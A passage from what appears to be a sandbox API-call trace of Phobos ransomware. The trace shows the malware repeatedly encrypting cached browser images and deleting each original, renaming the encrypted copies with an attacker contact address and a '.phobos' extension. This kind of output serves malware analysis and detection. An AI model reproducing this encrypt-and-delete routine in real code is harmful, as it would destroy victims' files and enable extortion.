lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.751] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.751] CloseHandle (hObject=0x160) returned 1 [0185.751] CloseHandle (hObject=0x14c) returned 1 [0185.752] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg")) returned 1 [0185.753] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.753] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5166) returned 1 [0185.753] CloseHandle (hObject=0x14c) returned 1 [0185.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg")) returned 0x2020 [0185.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.754] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.754] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.755] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.755] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x142e, lpOverlapped=0x0) returned 1 [0185.781] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1430, dwBufLen=0x1430 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1430) returned 1 [0185.781] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1430, lpOverlapped=0x0) returned 1 [0185.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0185.782] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.782] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.782] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.782] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.782] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.783] CloseHandle (hObject=0x14c) returned 1 [0185.783] CloseHandle (hObject=0x160) returned 1 [0185.783] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg")) returned 1 [0185.784] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.784] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=15979) returned 1 [0185.784] CloseHandle (hObject=0x160) returned 1 [0185.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg")) returned 0x2020 [0185.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.785] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.785] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.786] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.786] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e6b, lpOverlapped=0x0) returned 1 [0185.799] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e70, dwBufLen=0x3e70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e70) returned 1 [0185.799] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3e70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3e70, lpOverlapped=0x0) returned 1 [0185.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0185.800] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.800] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.800] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.800] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.801] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.801] CloseHandle (hObject=0x160) returned 1 [0185.801] CloseHandle (hObject=0x14c) returned 1 [0185.801] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg")) returned 1 [0185.802] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.802] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2066) returned 1 [0185.803] CloseHandle (hObject=0x14c) returned 1 [0185.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg")) returned 0x2020 [0185.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.804] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.804] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.805] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.805] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x812, lpOverlapped=0x0) returned 1 [0185.806] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x820, dwBufLen=0x820 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x820) returned 1 [0185.806] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x820, lpOverlapped=0x0) returned 1 [0185.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0185.807] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.807] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.807] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.807] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.808] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.808] CloseHandle (hObject=0x14c) returned 1 [0185.808] CloseHandle (hObject=0x160) returned 1 [0185.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg")) returned 1 [0185.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.809] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2850) returned 1 [0185.809] CloseHandle (hObject=0x160) returned 1 [0185.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg")) returned 0x2020 [0185.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.810] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.810] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.810] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.810] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.810] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb22, lpOverlapped=0x0) returned 1 [0185.857] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb30, dwBufLen=0xb30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb30) returned 1 [0185.857] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb30, lpOverlapped=0x0) returned 1 [0185.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0185.858] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.858] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.858] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.858] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.858] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.858] CloseHandle (hObject=0x160) returned 1 [0185.858] CloseHandle (hObject=0x14c) returned 1 [0185.859] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg")) returned 1 [0185.859] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.860] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1590) returned 1 [0185.860] CloseHandle (hObject=0x14c) returned 1 [0185.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg")) returned 0x2020 [0185.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.860] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.860] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 